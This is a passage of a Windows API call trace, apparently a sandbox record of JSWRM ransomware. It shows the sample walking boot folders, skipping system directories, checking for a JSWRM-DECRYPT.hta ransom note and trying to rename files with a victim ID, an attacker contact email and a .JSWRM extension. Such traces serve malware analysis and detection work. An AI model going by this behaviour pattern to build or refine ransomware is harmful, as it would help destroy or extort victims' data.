hHeap=0x1e0000) returned 1 [0064.263] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471a8 | out: hHeap=0x1e0000) returned 1 [0064.264] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0064.264] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0064.264] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0064.264] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0064.264] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f87c0 [0064.264] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x46) returned 0x2374e8 [0064.264] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f87c0 | out: hHeap=0x1e0000) returned 1 [0064.264] GetFileAttributesW (lpFileName="C:\\Boot\\ru-RU\\JSWRM-DECRYPT.hta" (normalized: "c:\\boot\\ru-ru\\jswrm-decrypt.hta")) returned 0x20 [0064.264] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2374e8 | out: hHeap=0x1e0000) returned 1 [0064.264] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0064.264] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8638 [0064.264] FindFirstFileW (in: lpFileName="C:\\Boot\\ru-RU\\*.*", lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4938cb0, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef698608, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0x1cf70362, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName=".", cAlternateFileName="")) returned 0x231dc0 [0064.264] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0064.264] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4938cb0, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef698608, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0x1cf70362, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="..", cAlternateFileName="")) returned 1 [0064.265] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0064.265] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0064.265] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4938cb0, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc4938cb0, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x21107f25, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12d60, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0064.265] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2=".") returned 1 [0064.265] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="..") returned 1 [0064.265] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="...") returned 1 [0064.265] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="windows") returned -1 [0064.265] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="recovery") returned -1 [0064.265] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="perflogs") returned -1 [0064.265] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="documents and settings") returned -1 [0064.265] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="$RECYCLE.BIN") returned 1 [0064.265] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="system volume information") returned -1 [0064.265] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="msocache") returned -1 [0064.265] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241358 [0064.265] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="bootmgr.exe.mui", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0064.265] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="bootmgr.exe.mui", cchWideChar=15, lpMultiByteStr=0x345f610, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bootmgr.exe.mui", lpUsedDefaultChar=0x0) returned 15 [0064.265] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241358 | out: hHeap=0x1e0000) returned 1 [0064.265] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0064.265] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="bootmgr.exe.mui", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0064.265] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="bootmgr.exe.mui", cchWideChar=15, lpMultiByteStr=0x345f5e0, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bootmgr.exe.mui", lpUsedDefaultChar=0x0) returned 15 [0064.265] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0064.265] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e268 [0064.265] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8638 | out: hHeap=0x1e0000) returned 1 [0064.265] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0064.265] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345f334, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0064.265] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e418 [0064.265] CreateFileW (lpFileName="C:\\Boot\\ru-RU\\bootmgr.exe.mui" (normalized: "c:\\boot\\ru-ru\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0064.266] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x345f2c8 | out: lpFileSize=0x345f2c8*=9256135561372696) returned 0 [0064.266] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0064.266] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x2471a8 [0064.266] ReadFile (in: hFile=0xffffffff, lpBuffer=0x2471a8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345f2d4, lpOverlapped=0x0 | out: lpBuffer=0x2471a8, lpNumberOfBytesRead=0x345f2d4*=0x0, lpOverlapped=0x0) returned 0 [0064.266] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471a8 | out: hHeap=0x1e0000) returned 1 [0064.266] CloseHandle (hObject=0xffffffff) returned 1 [0064.266] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20de78 [0064.267] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0064.267] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f87c0 [0064.267] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f87c0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0064.267] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0064.267] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f87c0 | out: hHeap=0x1e0000) returned 1 [0064.267] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0064.267] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a498 [0064.267] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a498, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0064.267] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a498 | out: hHeap=0x1e0000) returned 1 [0064.267] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c538 [0064.267] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x76) returned 0x226630 [0064.267] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c538 | out: hHeap=0x1e0000) returned 1 [0064.267] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235df0 [0064.267] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x226630 | out: hHeap=0x1e0000) returned 1 [0064.267] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0064.267] MoveFileW (lpExistingFileName="C:\\Boot\\ru-RU\\bootmgr.exe.mui" (normalized: "c:\\boot\\ru-ru\\bootmgr.exe.mui"), lpNewFileName="C:\\Boot\\ru-RU\\bootmgr.exe.mui.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\boot\\ru-ru\\bootmgr.exe.mui.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 0 [0064.267] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235df0 | out: hHeap=0x1e0000) returned 1 [0064.267] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20de78 | out: hHeap=0x1e0000) returned 1 [0064.267] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e418 | out: hHeap=0x1e0000) returned 1 [0064.267] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1cf70362, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x1cf70362, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x1cf70362, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0064.267] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0064.267] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0064.267] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0064.267] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0064.267] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0064.267] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0064.267] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0064.267] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0064.267] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0064.267] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0064.267] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0064.268] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0064.268] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0064.268] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x2412e0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0064.268] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0064.268] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0064.268] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0064.268] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241380 [0064.268] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241380, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0064.268] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0064.268] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e418 [0064.268] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e268 | out: hHeap=0x1e0000) returned 1 [0064.268] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241380 | out: hHeap=0x1e0000) returned 1 [0064.268] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0064.268] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4938cb0, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef698608, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2f699a6, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xafa0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0064.268] lstrcmpiW (lpString1="memtest.exe.mui", lpString2=".") returned 1 [0064.268] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="..") returned 1 [0064.268] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="...") returned 1 [0064.268] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="windows") returned -1 [0064.268] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="recovery") returned -1 [0064.268] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="perflogs") returned -1 [0064.268] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="documents and settings") returned 1 [0064.268] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="$RECYCLE.BIN") returned 1 [0064.268] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="system volume information") returned -1 [0064.268] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="msocache") returned -1 [0064.268] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241100 [0064.268] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="memtest.exe.mui", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0064.268] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="memtest.exe.mui", cchWideChar=15, lpMultiByteStr=0x345f610, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="memtest.exe.mui", lpUsedDefaultChar=0x0) returned 15 [0064.268] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241100 | out: hHeap=0x1e0000) returned 1 [0064.268] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0064.268] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="memtest.exe.mui", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0064.268] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="memtest.exe.mui", cchWideChar=15, lpMultiByteStr=0x345f5e0, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="memtest.exe.mui", lpUsedDefaultChar=0x0) returned 15 [0064.268] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0064.268] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20de78 [0064.269] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e418 | out: hHeap=0x1e0000) returned 1 [0064.269] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0064.269] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345f334, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0064.269] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e268 [0064.269] CreateFileW (lpFileName="C:\\Boot\\ru-RU\\memtest.exe.mui" (normalized: "c:\\boot\\ru-ru\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0064.269] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x345f2c8 | out: lpFileSize=0x345f2c8*=9251806234337896) returned 0 [0064.269] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0064.269] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x2471a8 [0064.269] ReadFile (in: hFile=0xffffffff, lpBuffer=0x2471a8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345f2d4, lpOverlapped=0x0 | out: lpBuffer=0x2471a8, lpNumberOfBytesRead=0x345f2d4*=0x0, lpOverlapped=0x0) returned 0 [0064.269] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471a8 | out: hHeap=0x1e0000) returned 1 [0064.269] CloseHandle (hObject=0xffffffff) returned 1 [0064.269] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dec0 [0064.269] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0064.269] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8638 [0064.269] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f8638, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0064.269] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8670 [0064.269] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8638 | out: hHeap=0x1e0000) returned 1 [0064.269] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0064.269] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a288 [0064.269] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a288, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0064.269] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a288 | out: hHeap=0x1e0000) returned 1 [0064.269] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c380 [0064.269] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x76) returned 0x225d30 [0064.269] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c380 | out: hHeap=0x1e0000) returned 1 [0064.269] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235d38 [0064.269] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225d30 | out: hHeap=0x1e0000) returned 1 [0064.269] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8670 | out: hHeap=0x1e0000) returned 1 [0064.269] MoveFileW (lpExistingFileName="C:\\Boot\\ru-RU\\memtest.exe.mui" (normalized: "c:\\boot\\ru-ru\\memtest.exe.mui"), lpNewFileName="C:\\Boot\\ru-RU\\memtest.exe.mui.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\boot\\ru-ru\\memtest.exe.mui.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 0 [0064.270] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235d38 | out: hHeap=0x1e0000) returned 1 [0064.270] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dec0 | out: hHeap=0x1e0000) returned 1 [0064.270] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e268 | out: hHeap=0x1e0000) returned 1 [0064.270] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4938cb0, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef698608, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2f699a6, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xafa0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 0 [0064.270] FindClose (in: hFindFile=0x231dc0 | out: hFindFile=0x231dc0) returned 1 [0064.270] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20de78 | out: hHeap=0x1e0000) returned 1 [0064.270] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0064.270] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0064.270] FindNextFileW (in: hFindFile=0x231d00, lpFindFileData=0x345f6c8 | out: lpFindFileData=0x345f6c8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4938cb0, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc4938cb0, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc4938cb0, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfffffffe, dwReserved1=0x345f828, cFileName="sk-SK", cAlternateFileName="")) returned 1 [0064.270] lstrcmpiW (lpString1="sk-SK", lpString2=".") returned 1 [0064.270] lstrcmpiW (lpString1="sk-SK", lpString2="..") returned 1 [0064.270] lstrcmpiW (lpString1="sk-SK", lpString2="...") returned 1 [0064.270] lstrcmpiW (lpString1="sk-SK", lpString2="windows") returned -1 [0064.270] lstrcmpiW (lpString1="sk-SK", lpString2="recovery") returned 1 [0064.270] lstrcmpiW (lpString1="sk-SK", lpString2="perflogs") returned 1 [0064.270] lstrcmpiW (lpString1="sk-SK", lpString2="documents and settings") returned 1 [0064.270] lstrcmpiW (lpString1="sk-SK", lpString2="$RECYCLE.BIN") returned 1 [0064.270] lstrcmpiW (lpString1="sk-SK", lpString2="system volume information") returned -1 [0064.270] lstrcmpiW (lpString1="sk-SK", lpString2="msocache") returned 1 [0064.270] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0064.270] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0064.270] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0064.270] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0064.270] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x46) returned 0x237178 [0064.270] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0064.270] GetFileAttributesW (lpFileName="C:\\Boot\\sk-SK\\JSWRM-DECRYPT.hta" (normalized: "c:\\boot\\sk-sk\\jswrm-decrypt.hta")) returned 0xffffffff [0064.270] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x237178 | out: hHeap=0x1e0000) returned 1 [0064.270] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0064.270] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345c52c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0064.271] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0064.271] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x23cc80 [0064.271] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0064.271] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x2471a8 [0064.293] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cc80 | out: hHeap=0x1e0000) returned 1 [0064.293] RtlAllocateHeap 